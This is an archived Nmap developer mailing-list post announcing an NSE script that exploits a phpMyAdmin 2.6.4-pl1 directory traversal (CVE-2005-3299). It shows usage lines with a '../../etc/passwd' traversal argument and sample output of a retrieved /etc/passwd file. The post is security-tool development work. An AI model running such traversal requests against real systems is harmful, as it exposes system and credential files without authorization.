Nmap Development mailing list archives
[NSE] http-phpmyadmin-dir-traversal
From: Meshcheryakov Alexey <tank1st99 () gmail com>
Date: Wed, 20 Mar 2013 14:12:40 +0400
Hi nmap-deev, attached is a script, which exploit a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1. I wrote this script for training purpose. Maybe it will be usefull for someone. -- @usage -- nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip> -- nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip> -- -- @args http-phpmyadmin-dir-traversal.file Remote file to retrieve. Default: <code>../../../../../etc/passwd</code> -- @args http-phpmyadmin-dir-traversal.outfile Output file -- @args http-phpmyadmin-dir-traversal.dir Basepath to the services page. Default: <code>/phpMyAdmin-2.6.4-pl1/</code> --- -- @output -- PORT STATE SERVICE -- 80/tcp open http -- | http-phpmyadmin-dir-traversal: -- | VULNERABLE: -- | phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion -- | State: VULNERABLE (Exploitable) -- | IDs: CVE:CVE-2005-3299 -- | Description: -- | PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array. -- | -- | Disclosure date: 2005-10-nil -- | Extra information: -- | ../../../../../../../../etc/passwd : -- | root:x:0:0:root:/root:/bin/bash -- | daemon:x:1:1:daemon:/usr/sbin:/bin/sh -- | bin:x:2:2:bin:/bin:/bin/sh -- | sys:x:3:3:sys:/dev:/bin/sh -- | sync:x:4:65534:sync:/bin:/bin/sync -- | games:x:5:60:games:/usr/games:/bin/sh -- | man:x:6:12:man:/var/cache/man:/bin/sh -- | lp:x:7:7:lp:/var/spool/lpd:/bin/sh -- | mail:x:8:8:mail:/var/mail:/bin/sh -- | news:x:9:9:news:/var/spool/news:/bin/sh -- | uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh -- | proxy:x:13:13:proxy:/bin:/bin/sh -- | www-data:x:33:33:www-data:/var/www:/bin/sh -- | backup:x:34:34:backup:/var/backups:/bin/sh -- | list:x:38:38:Mailing List Manager:/var/list:/bin/sh -- | irc:x:39:39:ircd:/var/run/ircd:/bin/sh -- | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh -- | nobody:x:65534:65534:nobody:/nonexistent:/bin/sh -- | libuuid:x:100:101::/var/lib/libuuid:/bin/sh -- | syslog:x:101:103::/home/syslog:/bin/false -- | sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin -- | dps:x:1000:1000:dps,,,:/home/dps:/bin/bash -- | vboxadd:x:999:1::/var/run/vboxadd:/bin/false -- | mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false -- | memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false -- | ../../../../../../../../etc/passwd saved to passwd.txt -- | -- | References: -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299 -- |_ http://www.exploit-db.com/exploits/1244/ Regards, Alexey Meshcheryakov
Attachment:
http-phpmyadmin-dir-traversal.nse
Description:
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] http-phpmyadmin-dir-traversal Meshcheryakov Alexey (Mar 20)